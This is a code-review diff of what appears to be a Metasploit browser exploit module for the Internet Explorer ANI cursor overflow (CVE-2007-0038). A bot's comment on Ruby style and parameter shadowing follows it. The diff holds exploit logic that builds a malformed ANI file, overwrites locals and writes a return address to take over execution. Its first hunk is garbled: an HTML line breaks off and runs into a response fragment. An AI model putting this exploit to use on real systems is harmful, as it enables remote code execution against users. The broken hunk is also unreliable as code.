diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
index 5fab17cb12..5050262024 100644
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@@ -146,6 +146,9 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 mytargs = (target.name =~ /All Targets/) ? targets : [target]
 mytargs.each_index do |i|
+
+ next if not mytargs[i].ret
+ html << "
'application/octet-stream' })
+ send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })
 handler(cli)
 end
- def generate_ani(payload)
+ def generate_ani(payload, target)
 # Build the first ANI header
 anih_a = [
@@ -201,8 +206,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 anih_b = nil
- case target.name
- when /Vista/
+ if (target.name =~ /Vista/)
 # Vista has ebp=80, eip=84
 anih_b = anih_a + rand_text(84-anih_a.length)
@@ -215,7 +219,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 # Overwrite locals with invalid pointers
 anih_b[64, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
 end
-
+
 # Overwrite the return with address of a "call ptr [ebx+4]"
 anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]
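Review bot: The rewritten condition `if (target.name =~ /Vista/)` wraps its test in parentheses, which is unidiomatic Ruby and reads as a leftover of the `case`/`when` it replaces; `if target.name =~ /Vista/` is the conventional form, and the first hunk's `next if not mytargs[i].ret` has the same flavour and reads more naturally as `next unless mytargs[i].ret`. The `target` read in this condition is now the parameter added in the previous hunk, which shadows the module-level `target` accessor for the whole of generate_ani, so the `target.ret` and `target['Len']` reads in the following hunk also resolve to the caller-supplied entry; a short comment on the parameter, e.g. `# target: the entry from `targets` to build the file for; deliberately shadows the module-level target`, would make that explicit. generate_ani begins in the earlier hunk and its body continues past this one, so whether every branch of the new `if` assigns anih_b cannot be confirmed from here.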